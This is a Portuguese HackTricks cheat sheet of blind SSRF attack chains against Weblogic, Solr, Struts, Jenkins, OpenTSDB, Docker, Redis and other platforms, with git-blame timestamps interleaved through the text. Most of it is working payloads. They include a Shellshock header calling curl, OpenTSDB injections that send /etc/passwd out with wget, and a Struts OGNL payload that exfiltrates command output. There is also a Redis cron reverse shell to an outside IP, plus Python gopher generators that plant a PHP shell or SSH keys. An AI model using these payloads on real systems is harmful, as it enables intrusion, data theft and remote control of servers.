2023-07-13 10:23:45 +00:00
# Plataformas Vulneráveis a SSRF
2022-04-28 16:01:33 +00:00
< details >
2024-01-01 18:32:14 +00:00
< summary > < strong > Aprenda hacking no AWS do zero ao herói com< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-01 18:32:14 +00:00
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** , confira os [**PLANOS DE ASSINATURA** ](https://github.com/sponsors/carlospolop )!
* Adquira o [**material oficial PEASS & HackTricks** ](https://peass.creator-spring.com )
* Descubra [**A Família PEASS** ](https://opensea.io/collection/the-peass-family ), nossa coleção de [**NFTs** ](https://opensea.io/collection/the-peass-family ) exclusivos
* **Participe do grupo** 💬 [**Discord** ](https://discord.gg/hRep4RUj7f ) ou do grupo [**telegram** ](https://t.me/peass ) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) no github.
2022-04-28 16:01:33 +00:00
< / details >
2023-06-06 18:56:34 +00:00
Esta seção foi copiada de [https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/ ](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/ )
2022-02-13 12:30:13 +00:00
2023-07-13 10:23:45 +00:00
## Elasticsearch
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**Porta comum: 9200**
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
Quando o Elasticsearch é implantado internamente, geralmente não requer autenticação.
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
Se você tem um SSRF parcialmente cego onde pode determinar o código de status, verifique se os seguintes endpoints retornam um 200:
2022-02-13 12:30:13 +00:00
```http
/_cluster/health
/_cat/indices
/_cat/health
```
2024-01-01 18:32:14 +00:00
Se você tem um SSRF cego onde pode enviar requisições POST, você pode desligar a instância do Elasticsearch enviando uma requisição POST para o seguinte caminho:
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
Nota: a API `_shutdown` foi removida do Elasticsearch na versão 2.x. e superiores. Isso só funciona no Elasticsearch 1.6 e abaixo:
2022-02-13 12:30:13 +00:00
```http
/_shutdown
/_cluster/nodes/_master/_shutdown
/_cluster/nodes/_shutdown
/_cluster/nodes/_all/_shutdown
```
2023-07-13 10:23:45 +00:00
## Weblogic
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**Portas comuns: 80, 443 (SSL), 7001, 8888**
2022-02-13 12:30:13 +00:00
2023-07-13 10:23:45 +00:00
**SSRF Canary: UDDI Explorer (CVE-2014-4210)**
2022-02-13 12:30:13 +00:00
```http
POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1
Host: target.com
Content-Length: 137
Content-Type: application/x-www-form-urlencoded
operator=http%3A%2F%2FSSRF_CANARY& rdoSearch=name& txtSearchname=test& txtSearchkey=& txtSearchfor=& selfor=Business+location& btnSubmit=Search
```
2023-06-06 18:56:34 +00:00
Isso também funciona via GET:
2022-02-13 12:30:13 +00:00
```bash
http://target.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2FSSRF_CANARY& rdoSearch=name& txtSearchname=test& txtSearchkey=& txtSearchfor=& selfor=Business+location& btnSubmit=Search
```
2024-01-01 18:32:14 +00:00
Este endpoint também é vulnerável a injeção CRLF:
2022-02-13 12:30:13 +00:00
```
GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://attacker.com:4000/exp%20HTTP/1.11%0AX-CLRF%3A%20Injected%0A& rdoSearch=name& txtSearchname=sdf& txtSearchkey=& txtSearchfor=& selfor=Business+location& btnSubmit=Search HTTP/1.0
Host: vuln.weblogic
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Connection: close
```
2023-07-13 10:23:45 +00:00
Resultará na seguinte solicitação:
2022-02-13 12:30:13 +00:00
```
root@mail:~# nc -lvp 4000
Listening on [0.0.0.0] (family 0, port 4000)
Connection from example.com 43111 received!
POST /exp HTTP/1.11
X-CLRF: Injected HTTP/1.1
Content-Type: text/xml; charset=UTF-8
soapAction: ""
Content-Length: 418
User-Agent: Java1.6.0_24
Host: attacker.com:4000
Accept: text/html, image/gif, image/jpeg, */* ; q=.2
Connection: Keep-Alive
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> < env:Envelope xmlns:soapenc = "http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd = "http://www.w3.org/2001/XMLSchema" xmlns:env = "http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi = "http://www.w3.org/2001/XMLSchema-instance" > < env:Header / > < env:Body > < find_business generic = "2.0" xmlns = "urn:uddi-org:api_v2" > < name > sdf< / name > < / find_business > < / env:Body > < / env:Envelope >
```
**SSRF Canary: CVE-2020-14883**
2024-01-01 18:32:14 +00:00
Retirado [daqui ](https://forum.90sec.com/t/topic/1412 ).
2022-02-13 12:30:13 +00:00
Linux:
```http
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: vulnerablehost:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
_nfpb=true& _pageLabel=& handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://SSRF_CANARY/poc.xml")
```
2024-01-01 18:32:14 +00:00
Windows:
2022-02-13 12:30:13 +00:00
```http
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: vulnerablehost:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
_nfpb=true& _pageLabel=& handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://SSRF_CANARY/poc.xml")
```
2023-07-13 10:23:45 +00:00
## Hashicorp Consul
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**Portas comuns: 8500, 8501 (SSL)**
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
Você pode encontrar o writeup [aqui ](https://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html ).
2022-02-13 12:30:13 +00:00
2023-07-13 10:23:45 +00:00
## Shellshock
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**Portas comuns: 80, 443 (SSL), 8080**
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
Para testar efetivamente o Shellshock, você pode precisar adicionar um cabeçalho contendo o payload. Os seguintes caminhos CGI valem a pena tentar:
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
Lista curta de caminhos CGI para teste:
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
[Gist contendo caminhos ](https://gist.github.com/infosec-au/009fcbdd5bad16bb6ceb36b838d96be4 ).
2022-02-13 12:30:13 +00:00
2023-07-13 10:23:45 +00:00
**SSRF Canary: Shellshock via User Agent**
2022-02-13 12:30:13 +00:00
```bash
User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; curl SSRF_CANARY
```
2023-07-13 10:23:45 +00:00
## Apache Druid
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**Portas comumente vinculadas: 80, 8080, 8888, 8082**
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
Veja a referência da API para Apache Druid [aqui ](https://druid.apache.org/docs/latest/operations/api-reference.html ).
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
Se você pode visualizar o código de status, verifique os seguintes caminhos para ver se eles retornam um código de status 200:
2022-02-13 12:30:13 +00:00
```bash
/status/selfDiscovered/status
/druid/coordinator/v1/leader
/druid/coordinator/v1/metadata/datasources
/druid/indexer/v1/taskStatus
```
2023-07-13 10:23:45 +00:00
Tarefas de desligamento, requer que você adivinhe os IDs das tarefas ou o nome da fonte de dados:
2022-02-13 12:30:13 +00:00
```bash
/druid/indexer/v1/task/{taskId}/shutdown
/druid/indexer/v1/datasources/{dataSource}/shutdownAllTasks
```
2024-01-01 18:32:14 +00:00
Supervisores de desligamento em Apache Druid Overlords:
2022-02-13 12:30:13 +00:00
```bash
/druid/indexer/v1/supervisor/terminateAll
/druid/indexer/v1/supervisor/{supervisorId}/shutdown
```
2023-07-13 10:23:45 +00:00
## Apache Solr
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**Porta comum: 8983**
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
**SSRF Canary: Parâmetro Shards**
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
> Para adicionar ao que o shubham está dizendo - escanear por solr é relativamente fácil. Existe um parâmetro shards= que permite que você redirecione SSRF para SSRF para verificar se você está atingindo uma instância solr às cegas.
2022-02-13 12:30:13 +00:00
>
2024-01-01 18:32:14 +00:00
> — Хавиж Наффи 🥕 (@nnwakelam) [13 de Janeiro de 2021](https://twitter.com/nnwakelam/status/1349298311853821956?ref_src=twsrc%5Etfw)
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
Retirado [daqui ](https://github.com/veracode-research/solr-injection ).
2022-02-13 12:30:13 +00:00
```bash
/search?q=Apple& shards=http://SSRF_CANARY/solr/collection/config%23& stream.body={"set-property":{"xxx":"yyy"}}
/solr/db/select?q=orange& shards=http://SSRF_CANARY/solr/atom& qt=/select?fl=id,name:author& wt=json
2023-07-13 10:23:45 +00:00
/xxx?q=aaa%26shards=http://SSRF_CANARY/solr
2022-02-13 12:30:13 +00:00
/xxx?q=aaa& shards=http://SSRF_CANARY/solr
```
**SSRF Canary: Solr XXE (2017)**
[Apache Solr 7.0.1 XXE (Packetstorm) ](https://packetstormsecurity.com/files/144678/Apache-Solr-7.0.1-XXE-Injection-Code-Execution.html )
```bash
/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://SSRF_CANARY/xxx"'> < a > < / a > '
/xxx?q={!type=xmlparser v="<!DOCTYPE a SYSTEM 'http://SSRF_CANARY/solr'> < a > < / a > "}
```
**RCE via dataImportHandler**
2023-06-06 18:56:34 +00:00
[Pesquisa sobre RCE via dataImportHandler ](https://github.com/veracode-research/solr-injection#3-cve-2019-0193-remote-code-execution-via-dataimporthandler )
2022-02-13 12:30:13 +00:00
2023-07-13 10:23:45 +00:00
## PeopleSoft
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**Portas comuns: 80,443 (SSL)**
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
Retirado desta pesquisa [aqui ](https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce ).
2022-02-13 12:30:13 +00:00
**SSRF Canary: XXE #1 **
```http
POST /PSIGW/HttpListeningConnector HTTP/1.1
Host: website.com
Content-Type: application/xml
...
<?xml version="1.0"?>
< !DOCTYPE IBRequest [
<!ENTITY x SYSTEM "http://SSRF_CANARY">
]>
< IBRequest >
2023-07-13 10:23:45 +00:00
< ExternalOperationName > &x; < / ExternalOperationName >
< OperationType / >
< From > < RequestingNode / >
< Password / >
< OrigUser / >
< OrigNode / >
< OrigProcess / >
< OrigTimeStamp / >
< / From >
< To >
< FinalDestination / >
< DestinationNode / >
< SubChannel / >
< / To >
< ContentSections >
< ContentSection >
< NonRepudiation / >
< MessageVersion / >
< Data > <![CDATA[<?xml version="1.0"?>your_message_content]]>
< / Data >
< / ContentSection >
< / ContentSections >
2022-02-13 12:30:13 +00:00
< / IBRequest >
```
2024-01-01 18:32:14 +00:00
**SSRF Canary: XXE #2 **
2022-02-13 12:30:13 +00:00
```http
POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1
Host: website.com
Content-Type: application/xml
...
<!DOCTYPE a PUBLIC "-//B/A/EN" "http://SSRF_CANARY">
```
2023-07-13 10:23:45 +00:00
## Apache Struts
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**Portas comuns: 80,443 (SSL),8080,8443 (SSL)**
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
Retirado [daqui ](https://blog.safebuff.com/2016/07/03/SSRF-Tips/ ).
2022-02-13 12:30:13 +00:00
**SSRF Canary: Struts2-016**:
2024-01-01 18:32:14 +00:00
Adicione isso ao final de cada endpoint/URL interno que você conhecer:
2022-02-13 12:30:13 +00:00
```http
?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SSRF_CANARY/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
```
2023-07-13 10:23:45 +00:00
## JBoss
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**Portas comuns: 80,443 (SSL),8080,8443 (SSL)**
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
Retirado [daqui ](https://blog.safebuff.com/2016/07/03/SSRF-Tips/ ).
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**SSRF Canary: Implante WAR a partir de URL**
2022-02-13 12:30:13 +00:00
```bash
/jmx-console/HtmlAdaptor?action=invokeOp& name=jboss.system:service=MainDeployer& methodIndex=17& arg0=http://SSRF_CANARY/utils/cmd.war
```
2023-07-13 10:23:45 +00:00
## Confluence
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**Portas comuns: 80,443 (SSL),8080,8443 (SSL)**
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**SSRF Canary: Sharelinks (versões do Confluence lançadas de novembro de 2016 e anteriores)**
2022-02-13 12:30:13 +00:00
```bash
/rest/sharelinks/1.0/link?url=https://SSRF_CANARY/
```
**SSRF Canary: iconUriServlet - Confluence < 6.1.3 ( CVE-2017-9506 ) * *
2023-06-06 18:56:34 +00:00
[Ticket de Segurança Atlassian OAUTH-344 ](https://ecosystem.atlassian.net/browse/OAUTH-344 )
2022-02-13 12:30:13 +00:00
```bash
/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
```
2023-07-13 10:23:45 +00:00
## Jira
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**Portas comuns: 80,443 (SSL),8080,8443 (SSL)**
2022-02-13 12:30:13 +00:00
**SSRF Canary: iconUriServlet - Jira < 7.3.5 ( CVE-2017-9506 ) * *
2024-01-01 18:32:14 +00:00
[Ticket de Segurança da Atlassian OAUTH-344 ](https://ecosystem.atlassian.net/browse/OAUTH-344 )
2022-02-13 12:30:13 +00:00
```bash
/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
```
**SSRF Canary: makeRequest - Jira < 8.4.0 ( CVE-2019-8451 ) * *
2023-07-13 10:23:45 +00:00
[Ticket de Segurança da Atlassian JRASERVER-69793 ](https://jira.atlassian.com/browse/JRASERVER-69793 )
2022-02-13 12:30:13 +00:00
```bash
/plugins/servlet/gadgets/makeRequest?url=https://SSRF_CANARY:443@example.com
```
2023-07-13 10:23:45 +00:00
## Outros Produtos Atlassian
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**Portas comumente vinculadas: 80,443 (SSL),8080,8443 (SSL)**
2022-02-13 12:30:13 +00:00
**SSRF Canary: iconUriServlet (CVE-2017-9506)**:
* Bamboo < 6.0.0
* Bitbucket < 4.14.4
* Crowd < 2.11.2
* Crucible < 4.3.2
* Fisheye < 4.3.2
2023-07-13 10:23:45 +00:00
[Ticket de Segurança Atlassian OAUTH-344 ](https://ecosystem.atlassian.net/browse/OAUTH-344 )
2022-02-13 12:30:13 +00:00
```bash
/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
```
2023-07-13 10:23:45 +00:00
## OpenTSDB
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**Porta comum: 4242**
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
[Execução Remota de Código OpenTSDB ](https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html )
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**SSRF Canary: curl via RCE**
2022-02-13 12:30:13 +00:00
```bash
/q?start=2016/04/13-10:21:00& ignore=2& m=sum:jmxdata.cpu& o=& yrange=[0:]& key=out%20right%20top& wxh=1900x770%60curl%20SSRF_CANARY%60& style=linespoint& png
```
2023-06-06 18:56:34 +00:00
[Execução Remota de Código no OpenTSDB 2.4.0 ](https://github.com/OpenTSDB/opentsdb/issues/2051 )
2022-02-13 12:30:13 +00:00
2023-07-13 10:23:45 +00:00
**SSRF Canary: curl via RCE - CVE-2020-35476**
2022-02-13 12:30:13 +00:00
```bash
/q?start=2000/10/21-00:00:00& end=2020/10/25-15:56:44& m=sum:sys.cpu.nice& o=& ylabel=& xrange=10:10& yrange=[33:system('wget%20--post-file%20/etc/passwd%20SSRF_CANARY')]& wxh=1516x644& style=linespoint& baba=lala& grid=t& json
```
2023-07-13 10:23:45 +00:00
## Jenkins
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**Portas comuns: 80,443 (SSL),8080,8888**
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
Ótimo artigo [aqui ](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html ).
2022-02-13 12:30:13 +00:00
2023-07-13 10:23:45 +00:00
**SSRF Canary: CVE-2018-1000600**
2022-02-13 12:30:13 +00:00
```bash
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://SSRF_CANARY/%23& login=orange& password=tsai
```
**RCE**
2024-01-01 18:32:14 +00:00
Siga as instruções aqui para alcançar RCE via GET: [Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE! ](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html )
2022-02-13 12:30:13 +00:00
```bash
/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name='orange.tw', root='http://SSRF_CANARY/')%0a@Grab(group='tw.orange', module='poc', version='1')%0aimport Orange;
```
**RCE via Groovy**
```
cmd = 'curl burp_collab'
pay = 'public class x {public x(){"%s".execute()}}' % cmd
data = 'http://jenkins.internal/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true& value=' + urllib.quote(pay)
```
2023-07-13 10:23:45 +00:00
## Painel Hystrix
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**Portas comumente vinculadas: 80,443 (SSL),8080**
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
Spring Cloud Netflix, versões 2.2.x anteriores a 2.2.4, versões 2.1.x anteriores a 2.1.6.
2022-02-13 12:30:13 +00:00
2023-07-13 10:23:45 +00:00
**SSRF Canary: CVE-2020-5412**
2022-02-13 12:30:13 +00:00
```bash
/proxy.stream?origin=http://SSRF_CANARY/
```
2023-07-13 10:23:45 +00:00
## W3 Total Cache
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**Portas comuns: 80,443 (SSL)**
2022-02-13 12:30:13 +00:00
W3 Total Cache 0.9.2.6-0.9.3
2023-07-13 10:23:45 +00:00
**SSRF Canary: CVE-2019-6715**
2022-02-13 12:30:13 +00:00
2023-07-13 10:23:45 +00:00
Isso precisa ser uma requisição PUT:
2022-02-13 12:30:13 +00:00
```bash
PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36
Content-Length: 124
Content-Type: application/x-www-form-urlencoded
Connection: close
{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://SSRF_CANARY"}
```
**SSRF Canary**
2024-01-01 18:32:14 +00:00
O aviso sobre essa vulnerabilidade foi publicado aqui: [Vulnerabilidade SSRF do W3 Total Cache ](https://klikki.fi/adv/w3\_total\_cache.html )
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
Este código PHP irá gerar um payload para o seu host SSRF Canary (substitua `url` pelo seu host canary):
2022-02-13 12:30:13 +00:00
```php
< ?php
$url='http://www.google.com';
$file=strtr(base64_encode(gzdeflate($url.'#https://ajax.googleapis.com')), '+/=', '-_');
$file=chop($file,'=');
$req='/wp-content/plugins/w3-total-cache/pub/minify.php?file='.$file.'.css';
echo($req);
?>
```
2023-07-13 10:23:45 +00:00
## Docker
2022-02-13 12:30:13 +00:00
2023-07-13 10:23:45 +00:00
**Portas comumente vinculadas: 2375, 2376 (SSL)**
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
Se você tem um SSRF parcialmente cego, você pode usar os seguintes caminhos para verificar a presença da API do Docker:
2022-02-13 12:30:13 +00:00
```bash
/containers/json
/secrets
/services
```
2023-06-06 18:56:34 +00:00
**RCE através da execução de uma imagem docker arbitrária**
2022-02-13 12:30:13 +00:00
```http
POST /containers/create?name=test HTTP/1.1
Host: website.com
Content-Type: application/json
...
{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}
```
2024-01-01 18:32:14 +00:00
Substitua alpine por uma imagem arbitrária que você gostaria que o contêiner do docker executasse.
2022-02-13 12:30:13 +00:00
2023-07-13 10:23:45 +00:00
## Gitlab Prometheus Redis Exporter
2022-02-13 12:30:13 +00:00
2023-07-13 10:23:45 +00:00
**Portas comumente vinculadas: 9121**
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
Esta vulnerabilidade afeta instâncias do Gitlab antes da versão 13.1.1. De acordo com a [documentação do Gitlab ](https://docs.gitlab.com/ee/administration/monitoring/prometheus/#configuring-prometheus ) `Prometheus e seus exportadores estão ativados por padrão, a partir do GitLab 9.0.`
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
Esses exportadores fornecem um excelente método para um atacante pivotar e atacar outros serviços usando CVE-2020-13379. Um dos exportadores que é facilmente explorado é o Redis Exporter.
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
O seguinte endpoint permitirá que um atacante despeje todas as chaves no servidor redis fornecido via parâmetro target:
2022-02-13 12:30:13 +00:00
```bash
http://localhost:9121/scrape?target=redis://127.0.0.1:7001& check-keys=*
```
2023-10-26 14:38:17 +00:00
***
2023-06-06 18:56:34 +00:00
**Possível via Gopher**
2022-02-13 12:30:13 +00:00
2023-07-13 10:23:45 +00:00
## Redis
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**Porta comum: 6379**
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
Leitura recomendada:
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
* [Tentando hackear Redis via requisições HTTP ](https://www.agarri.fr/blog/archives/2014/09/11/trying_to_hack_redis_via_http_requests/index.html )
* [Exploits SSRF contra Redis ](https://maxchadwick.xyz/blog/ssrf-exploits-against-redis )
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
**RCE via Cron** - [Superfícies de Ataque Gopher ](https://blog.chaitin.cn/gopher-attack-surfaces/ )
2022-02-13 12:30:13 +00:00
```bash
redis-cli -h $1 flushall
echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/172.19.23.228/2333 0>& 1\n\n"|redis-cli -h $1 -x set 1
redis-cli -h $1 config set dir /var/spool/cron/
redis-cli -h $1 config set dbfilename root
redis-cli -h $1 save
```
2024-01-01 18:32:14 +00:00
Gopher:
2022-02-13 12:30:13 +00:00
```bash
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/172.19.23.228/2333 0>& 1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
```
2023-07-13 10:23:45 +00:00
**RCE via Shell Upload (PHP)** - [Resumo do Redis Getshell ](https://www.mdeditor.tw/pl/pBy0 )
2022-02-13 12:30:13 +00:00
```python
#!/usr/bin/env python
# -*-coding:utf-8-*-
import urllib
protocol="gopher://"
ip="192.168.189.208"
2023-07-13 10:23:45 +00:00
port="6379"
2022-02-13 12:30:13 +00:00
shell="\n\n<?php phpinfo();?> \n\n"
filename="shell.php"
2023-07-13 10:23:45 +00:00
path="/var"
2022-02-13 12:30:13 +00:00
passwd=""
cmd=["flushall",
2023-07-13 10:23:45 +00:00
"set 1 {}".format(shell.replace(" ","${IFS}")),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
"save"
]
2022-02-13 12:30:13 +00:00
if passwd:
2023-07-13 10:23:45 +00:00
cmd.insert(0,"AUTH {}".format(passwd))
2022-02-13 12:30:13 +00:00
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
2023-07-13 10:23:45 +00:00
CRLF="\r\n"
redis_arr = arr.split(" ")
cmd=""
cmd+="*"+str(len(redis_arr))
for x in redis_arr:
cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
cmd+=CRLF
return cmd
2022-02-13 12:30:13 +00:00
if __name__ =="__main__":
2023-07-13 10:23:45 +00:00
for x in cmd:
payload += urllib.quote(redis_format(x))
print payload
2022-02-13 12:30:13 +00:00
```
2024-01-01 18:32:14 +00:00
**RCE via authorized_keys** - [Resumo do Redis Getshell ](https://www.mdeditor.tw/pl/pBy0 )
2022-02-13 12:30:13 +00:00
```python
import urllib
protocol="gopher://"
ip="192.168.189.208"
port="6379"
# shell="\n\n<?php eval($_GET[\"cmd\"]);?>\n\n"
sshpublic_key = "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8IOnJUAt5b/5jDwBDYJTDULjzaqBe2KW3KhqlaY58XveKQRBLrG3ZV0ffPnIW5SLdueunb4HoFKDQ/KPXFzyvVjqByj5688THkq1RJkYxGlgFNgMoPN151zpZ+eCBdFZEf/m8yIb3/7Cp+31s6Q/DvIFif6IjmVRfWXhnkjNehYjsp4gIEBiiW/jWId5yrO9+AwAX4xSabbxuUyu02AQz8wp+h8DZS9itA9m7FyJw8gCrKLEnM7PK/ClEBevDPSR+0YvvYtnUxeCosqp9VrjTfo5q0nNg9JAvPMs+EA1ohUct9UyXbTehr1Bdv4IXx9+7Vhf4/qwle8HKali3feIZ root@kali\n\n"
filename="authorized_keys"
path="/root/.ssh/"
passwd=""
cmd=["flushall",
2023-07-13 10:23:45 +00:00
"set 1 {}".format(sshpublic_key.replace(" ","${IFS}")),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
"save"
]
2022-02-13 12:30:13 +00:00
if passwd:
2023-07-13 10:23:45 +00:00
cmd.insert(0,"AUTH {}".format(passwd))
2022-02-13 12:30:13 +00:00
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
2023-07-13 10:23:45 +00:00
CRLF="\r\n"
redis_arr = arr.split(" ")
cmd=""
cmd+="*"+str(len(redis_arr))
for x in redis_arr:
cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
cmd+=CRLF
return cmd
2022-02-13 12:30:13 +00:00
if __name__ =="__main__":
2023-07-13 10:23:45 +00:00
for x in cmd:
payload += urllib.quote(redis_format(x))
print payload
2022-02-13 12:30:13 +00:00
```
2023-06-06 18:56:34 +00:00
**RCE no GitLab via protocolo Git**
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
Ótimo artigo de Liveoverflow [aqui ](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/ ).
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
